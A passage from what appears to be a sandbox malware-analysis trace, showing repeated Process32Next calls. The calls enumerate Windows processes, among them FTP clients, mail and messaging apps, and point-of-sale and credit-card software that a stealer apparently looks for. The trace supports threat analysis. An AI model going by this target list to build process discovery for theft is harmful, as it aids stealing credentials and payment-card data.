hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.363] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.365] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.366] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.368] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.370] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.372] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.374] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.376] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.378] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.380] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.382] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.384] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.418] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.420] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.421] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0217.423] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0217.424] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.425] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0217.428] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0217.430] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0217.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0217.433] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.434] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0217.436] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.439] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.441] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0217.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0217.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0217.445] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0217.447] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0217.465] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0217.467] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0217.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0217.470] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0217.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0217.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0217.475] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0217.477] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0217.479] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0217.481] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0217.483] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0217.484] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0217.486] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0217.488] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0217.489] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0217.491] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0217.493] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0217.496] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0217.498] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0217.500] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0217.501] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0217.503] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0217.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0217.506] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0217.508] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0217.510] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0217.561] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0217.564] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0217.567] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0217.569] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0217.571] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0217.574] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0217.576] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0217.578] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0217.580] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0217.583] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0217.585] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0217.587] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0217.589] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0217.591] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0217.593] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0217.595] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0217.597] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0217.600] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0217.602] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0217.604] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0217.631] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0217.633] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0217.635] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0217.641] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0217.643] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 